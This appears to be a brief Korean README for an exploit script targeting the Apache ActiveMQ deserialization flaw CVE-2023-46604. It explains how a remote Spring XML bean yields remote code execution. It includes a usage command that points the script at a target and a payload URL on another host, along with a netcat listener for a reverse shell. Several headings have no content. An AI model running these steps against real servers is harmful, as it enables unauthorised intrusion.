
이 스크립트는 Apache ActiveMQ(CVE-2023-46604)의 안전하지 않은 역직렬화 취약점을 악용합니다.
공격 기술 요약: CVE-2023-46604
이 스크립트는 Apache ActiveMQ의 안전하지 않은 역직렬화 취약점(CVE-2023-46604)을 악용하여 대상 서버에서 원격 코드 실행을 달성합니다.
악용 과정 설명
취약점 대상:
사전 요구 사항:
공격 구성 요소:
공격 단계
페이로드 준비:
페이로드 전송:
악성 코드 실행:
ActiveMQ 서버는 페이로드에 지정된 객체를 역직렬화합니다.
안전하지 않은 역직렬화로 인해 XML 파일에 정의된 Spring bean이 로드되고 실행됩니다.
이 bean은 서버에서 악성 명령(예: 리버스 셸)을 실행합니다.
실행 예시:
python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml
nc -lvnp 9001
이 스크립트는 스페인어로 복사 및 수정되었습니다:https://github.com/evkl1d/CVE-2023-46604.git